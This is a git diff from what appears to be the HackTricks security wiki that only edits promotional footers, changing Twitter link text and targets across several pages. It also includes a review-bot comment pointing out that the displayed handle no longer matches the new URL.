@@ -127,7 +127,7 @@ mount disk.img /mnt -o ro,offset=$((2048*512)) * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md index b08236920..2768e4307 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/generic-methodologies-and-resources/external-recon-methodology/README.md 
@@ -719,7 +719,7 @@ There are several tools out there that will perform part of the proposed actions ## **References** -* **All free courses of** [**@Jhaddix**](https://twitter.com/Jhaddix) **(like** [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)**)** +* All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) \ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! diff --git a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md index e6686a7e7..a26e77ec1 100644 --- a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md +++ b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md 
@@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. 
@@ -618,7 +618,7 @@ tunnels: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/linux-hardening/privilege-escalation/README.md b/linux-hardening/privilege-escalation/README.md index 8fbe4af1e..c4769efff 100644 --- a/linux-hardening/privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/README.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
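Review bot: the rewritten footer line in linux-hardening/privilege-escalation/README.md (and the identical hunks in the other linux-hardening files in this PR) changes the link target from `https://twitter.com/carlospolopm` to `https://twitter.com/hacktricks_live` but leaves the visible text as `[**@carlospolopm**]`, so readers see one handle and are sent to another. If the account is now `hacktricks_live`, change the link text to `@hacktricks_live` as well; if both accounts still exist, keep text and URL pointing at the same one.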
@@ -1686,7 +1686,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/README.md b/linux-hardening/privilege-escalation/docker-security/README.md index 28ddcccc2..4776281a1 100644 --- a/linux-hardening/privilege-escalation/docker-security/README.md +++ b/linux-hardening/privilege-escalation/docker-security/README.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -449,7 +449,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md b/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md index b798c29cb..e96a571b4 100644 --- a/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -66,7 +66,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/apparmor.md b/linux-hardening/privilege-escalation/docker-security/apparmor.md index c003413a4..e67d3add8 100644 --- a/linux-hardening/privilege-escalation/docker-security/apparmor.md +++ b/linux-hardening/privilege-escalation/docker-security/apparmor.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -315,7 +315,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md b/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md index 2dcf63ef4..3357d629d 100644 --- a/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md +++ b/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -225,7 +225,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/cgroups.md b/linux-hardening/privilege-escalation/docker-security/cgroups.md index 423128381..bfed62d90 100644 --- a/linux-hardening/privilege-escalation/docker-security/cgroups.md +++ b/linux-hardening/privilege-escalation/docker-security/cgroups.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -108,7 +108,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md index 63434d1dc..0766cc0dc 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -680,7 +680,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md index 757955237..3f62c9116 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -81,7 +81,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md index 80dae83da..5861740c2 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -106,7 +106,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md index c7828ba6f..03def5893 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -163,7 +163,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/README.md b/linux-hardening/privilege-escalation/docker-security/namespaces/README.md index 6bcdee467..79ed96379 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/README.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/README.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
